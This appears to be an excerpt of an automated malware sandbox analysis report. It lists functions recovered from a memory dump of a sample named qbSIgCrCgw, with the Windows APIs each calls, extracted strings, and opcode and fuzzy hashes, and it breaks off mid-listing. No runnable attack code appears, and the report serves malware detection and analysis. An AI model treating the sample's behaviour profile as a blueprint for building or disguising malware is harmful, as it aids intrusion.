                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ColorLongWindow
                                                                                • String ID:
                                                                                • API String ID: 259745315-0
                                                                                • Opcode ID: 2ca06b85f2c80e9bb3524c8a694e199a038524c5b66482bfff5e69566d7e3141
                                                                                • Instruction ID: c0e003e82d64ab7b72fa5244bdff7e21251f3974729614012007c60f65d127e4
                                                                                • Opcode Fuzzy Hash: 2ca06b85f2c80e9bb3524c8a694e199a038524c5b66482bfff5e69566d7e3141
                                                                                • Instruction Fuzzy Hash: 2A41F031504110AFCF266F28E88AFB97B66AB06730F198269FD65CE1E6C7318C41DB25
                                                                                Function 003F690B Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                • String ID:
                                                                                • API String ID: 136442275-0
                                                                                • Opcode ID: 933d1a3536697c4a81e69d9920b947626e55859d8c01329ac0555ddadf74dc60
                                                                                • Instruction ID: 30e51fdd2719a7db8ce1963ed0514d9dd1b6692982536a23757a028f077f2aca
                                                                                • Opcode Fuzzy Hash: 933d1a3536697c4a81e69d9920b947626e55859d8c01329ac0555ddadf74dc60
                                                                                • Instruction Fuzzy Hash: 9E413BB784511CAECF66EB90DC42DDB73BDEB44300F0041A3B649AA141EB70ABE88F50
                                                                                Function 003FD76A Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 180COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CharLowerBuffW.USER32(0044DC00,0044DC00,0044DC00), ref: 003FD7CE
                                                                                • GetDriveTypeW.KERNEL32(?,00463A70,00000061), ref: 003FD898
                                                                                • _wcscpy.LIBCMT ref: 003FD8C2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharDriveLowerType_wcscpy
                                                                                • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                • API String ID: 2820617543-1000479233
                                                                                • Opcode ID: 14cd0d3e4131fdae34c19b91eca5cf5292f0e8c911cdf5fd6270244f18c8c0ce
                                                                                • Instruction ID: 0c4cec042be1b9418b88367ca5483f99f816d9df828807e06b919b7194e31cc2
                                                                                • Opcode Fuzzy Hash: 14cd0d3e4131fdae34c19b91eca5cf5292f0e8c911cdf5fd6270244f18c8c0ce
                                                                                • Instruction Fuzzy Hash: 7A5182311042449FC712EF14D896BAFB7A6EF84354F10892EF6995B2A2DB71ED05CB42
                                                                                Function 003B936C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __swprintf.LIBCMT ref: 003B93AB
                                                                                • __itow.LIBCMT ref: 003B93DF
                                                                                  • Part of subcall function 003D1557: _xtow@16.LIBCMT ref: 003D1578
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: __itow__swprintf_xtow@16
                                                                                • String ID: %.15g$0x%p$False$True
                                                                                • API String ID: 1502193981-2263619337
                                                                                • Opcode ID: 3b9820ba59e7aac15476933f42c6011d4e3828bfc17ec4fa5d19f0cc7a72a81a
                                                                                • Instruction ID: 17548867772ecfe4759f38127b87c658d2d142dde8086f48b36f75017c0adfb1
                                                                                • Opcode Fuzzy Hash: 3b9820ba59e7aac15476933f42c6011d4e3828bfc17ec4fa5d19f0cc7a72a81a
                                                                                • Instruction Fuzzy Hash: 0141F936604214AFDB25DF79E941FAAB3E8EF85304F20446FE249DB681EA35DA41CB14
                                                                                Function 0041A1B6 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0041A259
                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 0041A260
                                                                                • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 0041A273
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0041A27B
                                                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 0041A286
                                                                                • DeleteDC.GDI32(00000000), ref: 0041A28F
                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 0041A299
                                                                                • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 0041A2AD
                                                                                • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0041A2B9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                • String ID: static
                                                                                • API String ID: 2559357485-2160076837
                                                                                • Opcode ID: 52ca1843c408ecd86ee8f2a1fa91ecdf0a2299e4fc03cccc5bb2d13dbaa0fc6e
                                                                                • Instruction ID: e18b0bb293ea9f8818c16414c1939c1d045fa623b9d4bdb0b754c8f5d07d10d0
                                                                                • Opcode Fuzzy Hash: 52ca1843c408ecd86ee8f2a1fa91ecdf0a2299e4fc03cccc5bb2d13dbaa0fc6e
                                                                                • Instruction Fuzzy Hash: B1318D31501214ABDF115FA4EC49FEB3B69FF0D364F110225FA29A62A0C739D861DBA9
                                                                                Function 003F6F02 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                • String ID: 0.0.0.0
                                                                                • API String ID: 2620052-3771769585
                                                                                • Opcode ID: 3e7f9a67351d65d2c074151be6cbed52b8ee70de17d5abbf11187697978cddac
                                                                                • Instruction ID: 12cc72df99c8b1949272646f0352c8433c480046b9e3e655511833cc32c0b950
                                                                                • Opcode Fuzzy Hash: 3e7f9a67351d65d2c074151be6cbed52b8ee70de17d5abbf11187697978cddac
                                                                                • Instruction Fuzzy Hash: 6F110A72904219AFCB2AAB70BC4AEEA77ACDF40710F010176F245DA181EF70DE818754
                                                                                Function 003D500E Relevance: 16.8, APIs: 11, Instructions: 257COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 003D5047
                                                                                  • Part of subcall function 003D7C0E: __getptd_noexit.LIBCMT ref: 003D7C0E
                                                                                • __gmtime64_s.LIBCMT ref: 003D50E0
                                                                                • __gmtime64_s.LIBCMT ref: 003D5116
                                                                                • __gmtime64_s.LIBCMT ref: 003D5133
                                                                                • __allrem.LIBCMT ref: 003D5189
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003D51A5
                                                                                • __allrem.LIBCMT ref: 003D51BC
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003D51DA
                                                                                • __allrem.LIBCMT ref: 003D51F1
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003D520F
                                                                                • __invoke_watson.LIBCMT ref: 003D5280
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                • String ID:
                                                                                • API String ID: 384356119-0
                                                                                • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                                • Instruction ID: 30a761e1611924396b5b57e0827ece1f9843367b7c777e56f0ffa2244682cbda
                                                                                • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                                • Instruction Fuzzy Hash: B071D473E01B16ABE716AE79DC42B6AB3A8AF10764F15462BF410DA7C1E770DD408BD0
                                                                                Function 003F4DDD Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 003F4DF8
                                                                                • GetMenuItemInfoW.USER32(00471708,000000FF,00000000,00000030), ref: 003F4E59
                                                                                • SetMenuItemInfoW.USER32(00471708,00000004,00000000,00000030), ref: 003F4E8F
                                                                                • Sleep.KERNEL32(000001F4), ref: 003F4EA1
                                                                                • GetMenuItemCount.USER32(?), ref: 003F4EE5
                                                                                • GetMenuItemID.USER32(?,00000000), ref: 003F4F01
                                                                                • GetMenuItemID.USER32(?,-00000001), ref: 003F4F2B
                                                                                • GetMenuItemID.USER32(?,?), ref: 003F4F70
                                                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 003F4FB6
                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003F4FCA
                                                                                • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003F4FEB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                • String ID:
                                                                                • API String ID: 4176008265-0
                                                                                • Opcode ID: 47e2e4cd0422de10e61e0a01a4c9a5b7de6ca479eff83e8965f2e123e61d9bc6
                                                                                • Instruction ID: 1bac1ba8674c506759df63458ec0310ffba7a0b740b83be4bd621d6fdb34ac75
                                                                                • Opcode Fuzzy Hash: 47e2e4cd0422de10e61e0a01a4c9a5b7de6ca479eff83e8965f2e123e61d9bc6
                                                                                • Instruction Fuzzy Hash: 2A617C7590038DAFDB22CFA8D888ABF7BB8FB45318F150159F646A7261D731AD45CB20
                                                                                Function 00419C16 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00419C98
                                                                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00419C9B
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00419CBF
                                                                                • _memset.LIBCMT ref: 00419CD0
                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00419CE2
                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00419D5A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$LongWindow_memset
                                                                                • String ID:
                                                                                • API String ID: 830647256-0
                                                                                • Opcode ID: 40a22030c4cef7597bae6b6d8c9639c5b3e21d836e834dd2822da45ab446d756
                                                                                • Instruction ID: 7f12b4d6139fb2147bd4ef6eaf5821306cd7274fccd345b81ede0b97b99b3648
                                                                                • Opcode Fuzzy Hash: 40a22030c4cef7597bae6b6d8c9639c5b3e21d836e834dd2822da45ab446d756
                                                                                • Instruction Fuzzy Hash: A0618D75900208AFDB11CFA8DC81EEE77B8EB09704F14416AFA08A73A1D774AD82DB54
                                                                                Function 003E94E1 Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 003E94FE
                                                                                • SafeArrayAllocData.OLEAUT32(?), ref: 003E9549
                                                                                • VariantInit.OLEAUT32(?), ref: 003E955B
                                                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 003E957B
                                                                                • VariantCopy.OLEAUT32(?,?), ref: 003E95BE
                                                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 003E95D2
                                                                                • VariantClear.OLEAUT32(?), ref: 003E95E7
                                                                                • SafeArrayDestroyData.OLEAUT32(?), ref: 003E95F4
                                                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 003E95FD
                                                                                • VariantClear.OLEAUT32(?), ref: 003E960F
                                                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 003E961A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                • String ID:
                                                                                • API String ID: 2706829360-0
                                                                                • Opcode ID: 3e6b30fde21489759e61e818f266ccb4baf2368cd7ca2e1053e704d288bfffa0
                                                                                • Instruction ID: 1e8757d60dd519aeba13b09bbab62c77e3765fd84cd8182aaf2c02328c3388ed
                                                                                • Opcode Fuzzy Hash: 3e6b30fde21489759e61e818f266ccb4baf2368cd7ca2e1053e704d288bfffa0
                                                                                • Instruction Fuzzy Hash: 2D415F71D00229AFCB02DFA5DC44ADEBB79FF18354F00806AF511A72A1DB31EA45CBA4
                                                                                Function 0040BB08 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 264COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$ClearInit$_memset
                                                                                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$h?F$|?F
                                                                                • API String ID: 2862541840-156164444
                                                                                • Opcode ID: 63f71e65fb6427306f282899a7d0bfb52c44a6dcd7b65e802102a2d81e1573cd
                                                                                • Instruction ID: 5c27298f53a1f7693f9867327a268b84e78e87ff68b955b83a319773e466ca0c
                                                                                • Opcode Fuzzy Hash: 63f71e65fb6427306f282899a7d0bfb52c44a6dcd7b65e802102a2d81e1573cd
                                                                                • Instruction Fuzzy Hash: CD91AF71A04219ABDF24CFA4D844FAFB7B8EF85710F10856AF515BB280D7789941CFA8
                                                                                Function 0040ADAE Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 003B936C: __swprintf.LIBCMT ref: 003B93AB
                                                                                  • Part of subcall function 003B936C: __itow.LIBCMT ref: 003B93DF
                                                                                • CoInitialize.OLE32 ref: 0040ADF6
                                                                                • CoUninitialize.OLE32 ref: 0040AE01
                                                                                • CoCreateInstance.OLE32(?,00000000,00000017,0043D8FC,?), ref: 0040AE61
                                                                                • IIDFromString.OLE32(?,?), ref: 0040AED4
                                                                                • VariantInit.OLEAUT32(?), ref: 0040AF6E
                                                                                • VariantClear.OLEAUT32(?), ref: 0040AFCF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                • API String ID: 834269672-1287834457
                                                                                • Opcode ID: c3d3aeba2d29eef19bc653df90231264d1bb065c98004ad14655ea780a21ebbd
                                                                                • Instruction ID: f2eea27a340ec07a10896417d37f92f15afbd6c12d4520038447ca0d1edf36b1
                                                                                • Opcode Fuzzy Hash: c3d3aeba2d29eef19bc653df90231264d1bb065c98004ad14655ea780a21ebbd
                                                                                • Instruction Fuzzy Hash: A561AD716083119FC711EF64D848B6BB7E8AF48704F10442AF985AB2D1C778ED59CB9B
                                                                                Function 00408107 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • WSAStartup.WSOCK32(00000101,?), ref: 00408168
                                                                                • inet_addr.WSOCK32(?,?,?), ref: 004081AD
                                                                                • gethostbyname.WSOCK32(?), ref: 004081B9
                                                                                • IcmpCreateFile.IPHLPAPI ref: 004081C7
                                                                                • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00408237
                                                                                • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0040824D
                                                                                • IcmpCloseHandle.IPHLPAPI(00000000), ref: 004082C2
                                                                                • WSACleanup.WSOCK32 ref: 004082C8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                • String ID: Ping
                                                                                • API String ID: 1028309954-2246546115
                                                                                • Opcode ID: 81588cb0c55642b73aecdf72211c030ce9282c6ca6ed4d4198e7fa5764ecd8c7
                                                                                • Instruction ID: bb86ef4b2a54cbfbc7e72d8dafdce535ae1745499ed0b1bb70616b4dbd45c21d
                                                                                • Opcode Fuzzy Hash: 81588cb0c55642b73aecdf72211c030ce9282c6ca6ed4d4198e7fa5764ecd8c7
                                                                                • Instruction Fuzzy Hash: C4518F316047009FD711AF24DE45B6AB7E5AF48310F04886EFA95EB2E1DB74E901CB4A
                                                                                Function 003FE389 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(00000001), ref: 003FE396
                                                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 003FE40C
                                                                                • GetLastError.KERNEL32 ref: 003FE416
                                                                                • SetErrorMode.KERNEL32(00000000,READY), ref: 003FE483
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Error$Mode$DiskFreeLastSpace
                                                                                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                • API String ID: 4194297153-14809454
                                                                                • Opcode ID: f8825f9ef0535d60ad7bf1f039b06224ddb1ec48fa7cb5b20d2081b148962772
                                                                                • Instruction ID: 20de5e25f563722518b7ccca7f0d1b8a9143ca004a75ecf3052507f725beaf1d
                                                                                • Opcode Fuzzy Hash: f8825f9ef0535d60ad7bf1f039b06224ddb1ec48fa7cb5b20d2081b148962772
                                                                                • Instruction Fuzzy Hash: A8319436A0020D9FDB02EF65D845FBDB7B4EF44304F14806AF615AB2A1DB749A01C791
                                                                                Function 003EB907 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 003EB98C
                                                                                • GetDlgCtrlID.USER32 ref: 003EB997
                                                                                • GetParent.USER32 ref: 003EB9B3
                                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 003EB9B6
                                                                                • GetDlgCtrlID.USER32(?), ref: 003EB9BF
                                                                                • GetParent.USER32(?), ref: 003EB9DB
                                                                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 003EB9DE
                                                                                Strings
